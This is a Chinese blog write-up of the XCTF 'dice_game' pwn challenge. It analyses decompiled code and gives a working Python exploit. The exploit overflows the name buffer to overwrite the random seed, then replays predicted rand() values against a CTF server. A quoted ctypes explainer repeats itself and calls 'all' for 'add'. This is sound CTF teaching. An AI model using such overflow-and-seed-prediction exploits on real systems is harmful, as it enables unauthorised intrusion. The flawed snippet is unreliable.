攻防世界高手进阶区——dice_game

已于 2022-02-25 15:29:04 修改
阅读量1.8k 收藏 2
点赞数 2
分类专栏: XCTF 文章标签: pwn python unctf
于 2022-02-19 20:31:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62675330/article/details/123023419
版权

攻防世界高手进阶区——dice_game

在这里插入图片描述

题目里面啥都没有。

一.分析文件

  1. checksec
    在这里插入图片描述
    只有栈溢出保护关闭了,其他都是开着的。

  2. 运行
    在这里插入图片描述
    可以看出是要猜数字,猜对50次。

  3. ida逆向

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char buf[55]; // [rsp+0h] [rbp-50h] BYREF
  char v5; // [rsp+37h] [rbp-19h]
  ssize_t v6; // [rsp+38h] [rbp-18h]
  unsigned int seed[2]; // [rsp+40h] [rbp-10h]
  unsigned int v8; // [rsp+4Ch] [rbp-4h]

  memset(buf, 0, 0x30uLL);                      // 给buf赋值为0
  *(_QWORD *)seed = time(0LL);                  // 获取当前时间到1970年一月一日的秒数
  printf("Welcome, let me know your name: ");
  fflush(stdout);                               // 刷新输出缓冲区
  v6 = read(0, buf, 80uLL);                     // 从标准输入读入0x50个字节并将读到的字节数返回给v6
                                                // 存在栈溢出漏洞
  if ( v6 <= 49 )
    buf[v6 - 1] = 0;
  printf("Hi, %s. Let's play a game.\n", buf);
  fflush(stdout);
  srand(seed[0]);                               // 伪随机数发生器
  v8 = 1;
  v5 = 0;
  while ( 1 )
  {
    printf("Game %d/50\n", v8);
    v5 = sub_A20();                             // 关键!!!!!!
    fflush(stdout);
    if ( v5 != 1 )
      break;
    if ( v5 )
    {
      if ( v8 == 50 )                           // 五十次全部正确即可得到flag
      {
        sub_B28(buf);
        break;
      }
      ++v8;
    }
  }
  puts("Bye bye!");
  return 0LL;
}

跟进一下sub_A20()

__int64 sub_A20()
{
  __int16 v1; // [rsp+Ch] [rbp-4h] BYREF
  __int16 v2; // [rsp+Eh] [rbp-2h]

  printf("Give me the point(1~6): ");
  fflush(stdout);
  scanf("%hd", &v1);
  if ( v1 > 0 && v1 <= 6 )
  {
    v2 = rand() % 6 + 1;
    if ( v1 <= 0 || v1 > 6 || v2 <= 0 || v2 > 6 )
      _assert_fail("(point>=1 && point<=6) && (sPoint>=1 && sPoint<=6)", "dice_game.c", 0x18u, "dice_game");
    if ( v1 == v2 )
    {
      puts("You win.");
      return 1LL;
    }
    else
    {
      puts("You lost.");
      return 0LL;
    }
  }
  else
  {
    puts("Invalid value!");
    return 0LL;
  }
}

可以看出是要答对50次数字。

int __fastcall sub_B28(const char *a1)
{
  char s[104]; // [rsp+10h] [rbp-70h] BYREF
  FILE *stream; // [rsp+78h] [rbp-8h]

  printf("Congrats %s\n", a1);
  stream = fopen("flag", "r");
  fgets(s, 100, stream);
  puts(s);
  return fflush(stdout);
}

答对后就可以开启flag文件。

二,解题思路

  1. 文件输入名字处存在栈溢出漏洞。

在这里插入图片描述

只需要覆盖0x40个字节就可以将seed覆盖。

  1. 覆盖seed后就可以将伪随机数生成器的种子给替换,

    伪随机数生成器的种子一样生成的随机数是相同的。

    (不同的动态链接库的rand函数算法可能不同,需要将文件给的so文件给用上)

  2. 再用python的ctypes模块实现即可。

三,exp

#coding=utf8
from pwn import *
from ctypes import * #导入c函数库模块,可以在python中实现对C语言函数的引用

sh = remote('111.200.241.244' ,50045)
libc = cdll.LoadLibrary("libc.so.6")#导入相应的动态链接库

payload = "a" * 0x40 + p64(0)#栈溢出文件,覆盖seed为0
sh.sendlineafter("name: ", payload)
# 构造答题的50个随机数
res = []   #数组声明
for i in range(50):
	res.append(libc.rand()%6+1)#导入随机数
print res
for point in res:
	sh.sendlineafter("point(1~6): ", str(point))
sh.interactive()

  • .dll,动态链接库英文为DLL,是Dynamic Link Library的缩写。DLL是一个包含可由多个程序,同时使用的代码数据的库

  • 模块ctypes是Python内建的用于调用动态链接库函数的功能模块,一定程度上可以用于Python与其他语言的混合编程。由于编写动态链接库,使用C/C++是最常见的方式,故ctypes最常用于Python与C/C++混合编程之中。

  • ctypes 是 Python 的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些库进行封装。

  • ctypes导出了cdll对象,在Windows系统中还导出了windlloledll对象用于载入动态连接库。通过操作这些对象的属性,你可以载入外部的动态链接库。cdll载入按标准的 cdecl调用协议导出的函数,而windll导入的库按stdcall调用协议调用其中的函数。 oledll也按stdcall调用协议调用其中的函数,并假定该函数返回的是Windows HRESULT错误 代码,并当函数调用失败时,自动根据该代码甩出一个OSError异常。

PS:关于ctypes引用一下大佬的解释

1 C函数的调用规定

C函数在调用过程中关于参数传递和压栈由多种规定,作为dll提供给其他程序调用时,必须明确并统一为同一种调用规定,否则会导致栈破坏,编译器负责具体实现调用规定,主要有以下几种调用规定

调用规定声明编译符号修饰调用规则说明
_stdcall__declspec(dllexport) int __stdcall fun(int a, int b)_fun@number参数从右向左入栈,调用者压栈,被调者负责弹栈win32 API默认调用规则
_cdecl__declspec(dllexport)int __cdecl fun(int a, int b)_fun参数从右向左入栈,调用者负责压栈和弹栈C/C++默认调用规则
_fastcall__declspec(dllexport)int __fastcall fun(int a, int b)@fun@number寄存器和栈共同参数与参数传递寄存器传参提高性能,难以跨平台

2 ctypes加载dll库接口

python下调用C库有多种方式,ctypes是其中一种比较方便的,调用时首先需要加载dll文件,根据C dll的调用规定不同需要使用不同接口,使用ctypes需要import ctypes

  • 对于stdcall的C dll
import ctypes
Objdll = ctypes.windll.LoadLibrary("dllpath") #接口1
Objdll = ctypes.WinDLL("dllpath") #接口2

以上两种接口都是可用的

  • 对于cdecl的C dll
import ctypes
Objdll = ctypes.cdll.LoadLibrary("dllpath")  
Objdll = ctypes.CDLL("dllpath")

对于简单的C函数,例如int add(int a, int b), 此时就可以直接调用了,如

import ctypes
Objdll = ctypes.cdll.LoadLibrary("dllpath")  
Objdll = ctypes.CDLL("dllpath")  

c = Objdll.all(1,3)
print(c) # 4

上两种接口都是可用的

  • 对于cdecl的C dll
import ctypes
Objdll = ctypes.cdll.LoadLibrary("dllpath")  
Objdll = ctypes.CDLL("dllpath")

对于简单的C函数,例如int add(int a, int b), 此时就可以直接调用了,如

import ctypes
Objdll = ctypes.cdll.LoadLibrary("dllpath")  
Objdll = ctypes.CDLL("dllpath")  

c = Objdll.all(1,3)
print(c) # 4

作者:cheng3100
链接:https://www.jianshu.com/p/b338e55c3b71
来源:简书

coke_pwn
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dice_game攻防世界进阶
shanwei274的博客
04-10 1676
dice_game XCTF 4th-QCTF-2018 前言,不得不说,虽然是个简单题但是还是要记录一下,来让自己记住这些东西。 考察的知识点是: 1.cdll_loadlibrary加载对应库使得Python可以使用c的函数。 2.关于srand函数中种子的介绍。 3.一些平时没有见过的杂项 保证我写的很详细,因为我也是个菜鸡 ----第一步查看保护喽 第一眼就很恐怖嗷,居然就只有canary没有开,其他的全开,got表也不能修改,我就很痛苦嗷 ----第二步ida看看 main函数这里要说的呢 1
dice_game:Jogo de dados,aoualizar apáginamostra o vencedor
03-08
骰子游戏 Sobre o projeto: Jogo de dados,或其他人。 Tecnologia ultilizada:Java语言 Demonstração: 结果会议结果: 拜拜 :rocket:
攻防世界pwn——dice_game
qq_62076255的博客
12-19 422
攻防世界pwn——dice_game做题记录
攻防世界-pwn-dice_game(srand(),rand(),随机数)
hanqdi_的博客
06-27 1755
高手进阶 dice_game 考察知识点: srand(),rand()函数,产生随机数。 srand和rand()配合使用产生伪随机数序列。 rand函数在产生随机数前,需要系统提供的生成伪随机数序列的种子,rand根据这个种子的值产生一系列随机数。 如果系统提供的种子没有变化,每次调用rand函数生成的伪随机数序列都是一样的。 比如:通常可以利用系统时间来改变系统的种子值,即srand(time(NULL)),可以为rand函数提供不同的种子值,进而产生不同的随机数序列。 如果srand(1),因为1
攻防世界-pwn dice_game(栈内变量覆盖)
菜的只能随便写写博客
10-09 489
  0x01 检查文件  下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。 64位elf 无栈保护 动态链接   0x02 程序分析  根据程序运行分析,程序应该是要求猜数字,连续答对50轮可获得flag。   0x03 IDA结构分析  从里面分析,可以看到程序的结构,while循环里面是猜数字的流程,一共50轮,并可以注意到18行设置了随机数的种子。...
dice_game [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列12
重新启程
12-23 1649
题目地址:dice_game 从这篇开始就正式进入高手进阶,一些简单的知识点我这里就不会再重复赘述了,请有需要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
攻防世界 Pwn dice_game
MrTreebook的博客
12-18 280
攻防世界 Pwn dice_game1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary,可能是简单的栈溢出 3.IDA分析 在sub_A20()中可以看出v2是一个通过种子生成的 1~6 的 随机数 之前有做过类似的题,只要控制种子即可预测随机数 在read函数处有栈溢出的漏洞 在下面看到需要连续答对50次才可以获取flag 那么我们构造的思路就是利用这个溢出点覆盖seed从而预测随机数 4.exp from pwn im
dice_game
03-11
Dice_Game 两人游戏,旨在与朋友一起玩或在计算机上玩。 在这个游戏中,使用了六个面的骰子。 玩家将轮流滚动六张面Kong的骰子,直到有人达到一百张并赢得比赛为止。 轮到玩家时,他们可以选择滚动或按住。 如果...
Dice_Game
03-13
Dice_Game
flutter_dice_game
03-11
flutter_dice_app 一个新的Flutter应用程序。 入门 该项目是Flutter应用程序的起点。 如果这是您的第一个Flutter项目,那么有一些资源可以帮助您入门: 要获得Flutter入门方面的帮助,请查看我们...flutter_dice_game
攻防世界dice_game(pwn)
CTF小白的博客
05-08 4621
dice_game 题目考察:rand()生成的随机数和随机种子seed()有关,通过观察题目,可以发现存在溢出漏洞,通过输入可以覆盖到seed(),实现一个可预测的随机数列。 题目分析 这边就可以看到,buf覆盖0x40位就能覆盖到seed。 sub_A20()如下,就是比较你输入的数是否和产生的随机数相等。 当回答正确50次时,会执行sub_B28这个函数,读取flag。 所以我们要做...
dice-game:一个简单的骰子游戏示例
04-08
骰子游戏 设置 通过单击右上角的“ Fork”按钮来分叉此存储库 使用git clone {url}将新存储git clone {url}到本地计算机 脚步 完成HTML文档中的步骤以构建骰子游戏的原型界面 调用getRandomDiceRoll()并将结果存储为名为diceRoll的变量 更新用户界面( document ),显示与卷数匹配的骰子面(svg图像) 使用diceRoll更新标签“您已滚动:#”(用滚动替换#) 将掷骰过程包装在名为rollTheDice()的函数中,从console调用它以进行测试 尖端 在开始之前,请考虑使用浏览器的开发人员工具手动创建解决方案原型首先将“元素”选项卡中的文档从卷3更改为卷4 接下来,考虑在JS中进行原型设计, diceRoll在获得随机数之前为diceRoll分配一个数字这将通过在分配随机值之前创建受控案例来提供帮助 在编写代码时,
功防世界dice_game
weixin_34190136的博客
05-03 254
buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。 Exploit 由于担心 python 的 randint 实现跟 libc 的不太一样,所以我写了个小程序 在vim编译运行.c文件步骤:...
攻防世界-dice_game-Writeup
SkYe's Blog
05-13 786
dice_game 题目来源: XCTF 4th-QCTF-2018 考点:栈溢出、混合编程 基本情况 程序实现的是一个具有用户姓名输入的菜随机数程序。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 栈溢出 一开始我在纠结是输入数字时使用的是短整型,可不可能是整型溢出,这样既能保持低位数字符合要求,又能控制
攻防世界-Reverse-Game
wuh2333的博客
06-24 425
攻防世界game,逆向
python学习笔记----循环语句(四)
取个名字太难了a的博客
04-28 913
随机数种子在生成随机数的过程中起到一个非常重要的作用。它是用于初始化随机数生成算法(伪随机数生成器)的初始值。随机数种子的作用可重复性:当你使用特定的种子值初始化随机数生成器时,即使在不同的运行环境或不同时间,生成的随机数序列都将是相同的。这对于调试和测试非常重要,因为它允许程序的行为在使用随机数时保持一致。控制随机性:种子提供了一种方法来控制随机数生成过程。通过改变种子,你可以获得不同的随机数序列,这对于模拟和其他需要随机输入的应用非常有用。
Day25-Java基础之常用类1
m0_46053885的博客
04-27 973
同时我们发现Math类中的方法都是静态的,因此在使用的时候我们可以直接通过类名去调用。对于计算机而言,其实是没有数据类型的概念的,都是0101010101,数据类型是编程语言自己规定的,所以在实际存储的时候,先把具体的数字变成二进制,每32个bit为一组,存储在数组中。比较内存地址值一般情况下是没有意义的,我们希望比较的是对象的属性,如果两个对象的属性相同,我们认为就是同一个对象;如果我们的数据是一个浮点类型的数据,有的时候计算机并不会将这个数据完全转换成一个二进制数据,而是将这个将其转换成一个无限的。
python基础知识
2301_77724654的博客
04-28 374
基本输入input(),若要输出整数或小数,可用int(),float()函数进行数据类型转换。缩进:Python使用缩进表示代码块,连续的具有相同缩进的多条语句为一个代码块,语句末尾为代码块的开头,同一个代码块要有相同的缩进。1 在Python3中,print()函数取代了Python2中的print语句。2 Python中程序文件运行方式为程序文件运行,交互式运行两种。赋值语句,简单赋值与序列赋值等,序列赋值可一次为多个变量赋值。注释:单行注释用#,多行注释用'''或'''''''
ROS学习教程--第一篇(初试ROS)
最新发布
隔壁老姚的博客
04-29 487
上述命令,会在工作空间下生成一个功能包,该功能包依赖于 roscpp、rospy 与 std_msgs,其中roscpp是使用C++实现的库,而rospy则是使用python实现的库,std_msgs是标准消息库,创建ROS功能包时,一般都会依赖这三个库实现。该文件定义有关软件包的属性,例如软件包名称,版本号,作者,维护者以及对其他catkin软件包的依赖性。在自定义包basic_correspondence的src目录下创建person_talker.py,编辑以下内容。
根据提示,在右侧编辑器 Begin-End 间补充代码,实现下面两个函数的功能。 two_dice():返回两个骰子的点数之和; two_dice_game(rounds):rounds为赌博轮数,即蒙特卡罗方法模拟次数,函数返回玩家的胜率。
05-28
下面是实现two_dice和two_dice_game函数的代码: ```python import random def two_dice(): return random.randint(1, 6) + random.randint(1, 6) def two_dice_game(rounds): wins = 0 for i in range(rounds): player = two_dice() dealer = two_dice() if player > dealer: wins += 1 win_rate = wins / rounds return win_rate ``` 其中,two_dice函数用于返回两个骰子的点数之和,通过random.randint函数生成两个1到6之间的随机整数,并返回它们的和。two_dice_game函数的参数rounds为赌博轮数,即蒙特卡罗方法模拟次数。在每轮赌博中,通过two_dice函数生成玩家和庄家的点数,如果玩家的点数大于庄家的点数,则计数器wins加1。最后,胜率等于计数器wins除以模拟次数rounds。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值